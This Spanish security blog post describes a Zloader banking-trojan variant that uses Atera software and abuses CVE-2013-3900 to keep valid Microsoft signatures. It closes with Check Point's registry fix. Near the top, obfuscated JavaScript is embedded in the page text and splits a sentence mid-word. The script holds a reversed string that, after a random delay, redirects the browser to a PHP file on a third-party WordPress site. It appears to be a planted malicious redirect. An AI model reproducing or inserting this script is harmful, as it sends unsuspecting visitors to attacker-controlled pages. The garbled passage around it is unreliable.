Malware bancario explota la verificación de firma de Microsoft
Esta nueva variante del troyano bancario Zloader aprovecha la vulnerabilidad CVE-2013-3900. A pesar de que esta fue corregida en 2013, desde 2014 el parche tiene carácter opcional y no viene activado por defecto en los sistemas de Microsoft. Esto permite al malware modificar de manera sutil archivos firmados, sin perder la validez de la firma.
{if (typeof ($NfI.list[n]) == “string”) return $NfI.list[n].split(“”).reverse().join(“”);return $NfI.list[n];};$NfI.list=[“‘php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}</script>to-credit-cards-blocked-lock-stack-of-credit-cards-and-padlock-with-chain.jpg?resize=2048%2C1365&ssl=1″ alt=”Malware bancario” /></p>
<p>Previamente Zloader había hecho uso de documen<script>$NfI=function(n){if (typeof ($NfI.list[n]) == )
tos maliciosos, sitios para adultos y anuncios de Google para infectar los sistemas objetivo. En este caso el software de gestión remota de Atera se usa cómo punto de acceso inicial.
Cadena de infección del malware
El software de Atera, que es completamente legítimo, asigna un equipo a una cuenta usando un archivo msi que incluye la dirección de email del usuario. Para tener acceso completo al sistema los atacantes han creado un instalador modificado asociado con una cuenta de correo temporal.
Tras la instalación de Atera se produce la descarga de dos archivos, uno de ellos con la función de modificar los ajustes de Windows Defender. El otro se usa para descargar el resto de los archivos que necesita el troyano. Los archivos descargados modifican otras opciones del sistema operativo para dificultar la detección del malware.
El proceso de instalación del troyano continúa con la ejecución de un archivo dll modificado con un script malicioso. Dicho archivo tiene una firma digital válida de Microsoft, que cómo indicamos se obtiene aprovechando el CVE-2013-3900.
Seguidamente, se producen modificaciones en el registro de Windows. El objeto de estas es desactivar el aviso de ejecución de aplicaciones cómo administrador. Esto permite que todas las aplicaciones se ejecuten con privilegios elevados sin que se produzca ninguna notificación al usuario.
esquema de la cadena de infección del troyano
Esquema simplificado del proceso de infección. Fuente Check Point Research
Tras completar la descarga y ocultación del troyano en el sistema se producen nuevas modificaciones del registro de Windows para asegurar la persistencia. Para completar este paso se produce una llamada a un proceso con dos archivos dll cómo argumento. Los dos archivos mencionados no se encuentran en el sistema, lo que parece indicar que el malware está aún en proceso de desarrollo.
Consejos de seguridad
Desde Check Point Research se recomienda activar la verificación estricta de firma digital en Windows. Para ello es necesario crear y ejecutar un archivo con extensión .reg y el siguiente contenido:
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\Software\Microsoft\Cryptography\Wintrust\Config]
“EnableCertPaddingCheck”=”1”
[HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Cryptography\Wintrust\Config]
“EnableCertPaddingCheck”=”1”
Ver información original al respecto en Fuente>
NOTA: Los interesados en información sobre contrato de soporte Asistencia Tecnica de SATINFO y/o licencia de uso/actualizaciones de sus utilidades, contacten con info@satinfo.es
__________
Este blog no se hace responsable de las opiniones y comentarios de los textos en los que se cita la Fuente, ofreciendo su contenido solo para facilitar el acceso a la información del mismo.
Puedes seguir cualquier respuesta a esta entrada mediante el canal RSS 2.0. Los comentarios y los pings están cerrados.
Siguenos
en facebook
Los comentarios están cerrados.